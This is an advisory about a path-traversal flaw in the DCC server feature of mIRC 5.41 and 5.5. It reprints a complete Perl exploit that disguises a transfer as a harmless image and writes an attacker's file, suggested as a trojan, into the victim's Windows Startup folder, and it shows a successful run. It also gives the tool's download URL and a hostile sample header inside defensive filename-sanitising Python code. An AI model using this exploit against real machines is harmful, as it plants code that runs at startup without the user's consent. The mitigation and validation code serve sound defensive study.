COMMAND

    mIRC

SYSTEMS AFFECTED

    Mirc 5.41, 5.5 'DCC Server'

PROBLEM

    Spikeman posted the following.  While talking with 'typo', he was
    given this mIRC bug, as the file itself says.  mIRC 5.5's newly
    introduced DCC server feature doesn't filter metacharacters (such as
    . and \) from the filenames it is sent.  The following script fakes
    the sending of a harmless file and then puts a malicious file in a
    wanted destination dir on the same hard drive (the autostart dir is
    a good choice).  This file can also be obtained from:

        http://spikeman.genocide2600.com/balu.pl

    Exploit follows:

    #!/usr/bin/perl
    # Mirc 5.5 'DCC Server' pathbug(balu) tool. - typo@inferno.tusculum.edu
    #
    # usage: ./balu.pl <hostname> <(any)nick> <file/trojan to send(local)>
    #                  <fake filename(imaginary)> <path+filename (remote)>
    #
    #

    use IO::Socket;

    $host = shift or die 'need a host to connect to.'; chomp $host;
    $nick = shift or die 'need source nick (e.g. satan)'; chomp $nick;
    $file = shift or die 'need a file to send (eg: ./evil.exe).'; chomp $file;
    $ffile = shift or die 'need a fake filename to send (eg: teen5.jpg).'; chomp $ffile;
    $rfile = shift or die 'need remote filename+path, eg(including the \'\'s): \'windows\startm~1\progra~1\autostart\bla.exe\' (which is the path of autostart in german win95)';
    chomp $rfile;
    ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,$atime,$mtime,$ctime,$blksize,$blocks) = stat($file);
    $mysock = IO::Socket::INET->new("$host:59") or die "can't connect to $host:59";

    #$mysock->send("100 bla\n");
    defined $mysock -> send("120 $nick $size $ffile" . ' ' x 74 .  '\..\..\..\..\..\\' . $rfile);

    FOO: while (defined $mysock) {
      $mysock->recv($bla,1);
      last FOO if $bla eq "\n";
      $foo .= $bla;
      goto exit if (!defined $mysock);
      goto exit if (!defined $bla);
    }

    ($f1,$f2,$f3) = split(/ /,$foo, 3);
    print "Nick of receiver: $f2 - Resume requested at offset: $f3\n";
    if ($f3 != 0) { print "Error: $f2 wants to resume.. aborting! Try another remote filename.\n"; goto exit; }
    print "sending... ";
    open(FILE,$file);
    while (<FILE>) {
      $mysock->send($_);
    }

    exit:
    print "done.\n";
    $mysock->close;

    Also,

        phear:~$./balu foo.bar.org RedMage ./evilfile.txt breasts.jpg
        'windows\startm~1\programs\startup\evilfile.txt'
        Nick of receiver: RedMage - Resume requested at offset: 0
        sending... done.
        phear:~$

        C:\WINDOWS> dir startm~1\programs\startup\e*.txt

         Volume in drive C is BOOT
         Volume Serial Number is 6396-30DC
         Directory of C:\WINDOWS\Start Menu\Programs\Startup

        EVILFI~1 TXT            22  02-01-99  1:53p evilfile.txt
                 1 file(s)             22 bytes
                 0 dir(s)     246,480,896 bytes free

        C:\WINDOWS>

    Successful on both mIRC 5.5 and mIRC 5.41.

SOLUTION

    This only works if the mIRC DCC server is turned on.  The best thing
    to do is to type '/dccserver off', or at least be a little more
    careful, until another mIRC is released or a better patch is
    provided by someone else.
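    As an added illustration of the check the DCC server lacks (this is
    example code, not mIRC's code nor part of the posted tool): a
    receiver-side parser for the '120 <nick> <size> <filename>' header
    that flags path metacharacters and reduces the name to one plain
    basename before anything is written under the download directory.
    The sample headers are constructed from the format shown above; the
    function names and download directory are assumptions.

```python
import ntpath
import os

# Constructed sample headers in the DCC server format shown above
# ("120 <nick> <size> <filename>"); the second is padded with spaces and a
# traversal prefix in the same way the posted tool builds its header.
BENIGN_HEADER = "120 RedMage 22 teen5.jpg\n"
HOSTILE_HEADER = ("120 RedMage 22 teen5.jpg" + " " * 74
                  + "\\..\\..\\..\\..\\..\\windows\\startm~1\\programs"
                  + "\\startup\\evilfile.txt\n")

def parse_dcc_send_header(line):
    """Split a DCC server SEND header into (nick, size, raw filename)."""
    parts = line.rstrip("\r\n").split(" ", 3)
    if len(parts) != 4 or parts[0] != "120" or not parts[2].isdigit():
        raise ValueError("not a well-formed DCC server SEND header")
    return parts[1], int(parts[2]), parts[3]

def has_path_metachars(filename):
    """True if the name carries anything that could steer it out of the download dir."""
    return ("\\" in filename or "/" in filename or ":" in filename
            or "\x00" in filename or ".." in filename)

def safe_dcc_filename(filename):
    """Reduce an untrusted DCC filename to a single basename, or raise.

    Both separator styles are collapsed (Windows accepts either), trailing
    dots and spaces are dropped (Windows ignores them), and names that leave
    no usable component, or still carry a drive prefix, are rejected.
    """
    if "\x00" in filename:
        raise ValueError("NUL byte in filename")
    base = ntpath.basename(filename.replace("/", "\\")).rstrip(" .")
    if base in ("", ".", "..") or ":" in base:
        raise ValueError("filename has no usable basename: %r" % filename)
    return base

def resolve_download_path(download_dir, filename):
    """Return the absolute path the file may be written to, inside download_dir."""
    root = os.path.abspath(download_dir)   # assumed receiver download directory
    target = os.path.abspath(os.path.join(root, safe_dcc_filename(filename)))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes download directory")
    return target
```

    A receiver that rejects any header for which has_path_metachars()
    is true, rather than silently renaming, also keeps the displayed
    filename and the written filename identical.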